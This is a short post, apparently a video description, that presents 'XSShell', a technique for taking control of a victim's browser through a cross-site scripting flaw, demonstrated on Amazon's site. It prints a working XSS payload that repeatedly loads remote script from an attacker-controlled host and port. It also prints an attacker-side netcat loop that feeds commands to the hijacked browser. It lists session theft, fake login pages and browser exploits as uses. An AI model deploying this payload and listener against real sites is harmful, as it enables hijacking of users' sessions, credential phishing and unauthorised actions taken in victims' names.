XSShell – Using XSS to Control a Browser
iSpeech.org
This video shows how easy is to control a browser of a victim exploiting a XSS flaw (in this case on Amazon's website).
XSShell provides a micro pseudo-shell to run javascript code on victim's browser which makes possible to an attacker:
- steal the user session;
- perform actions on behalf of the user (like an admin);
- open any other page/site (and download something);
- trick the user with fake login page;
- launch exploits against the browser.
XSShell code for target:
XSShell - Target
<svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
— Brute Logic (@brutelogic) September 2, 2015
XSShell code for attacker:
XSShell - Attacker
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
— Brute Logic (@brutelogic) September 2, 2015
Follow me on Twitter:
http://twitter.com/brutelogic
2015-09-02 14:02:41
source
Gloss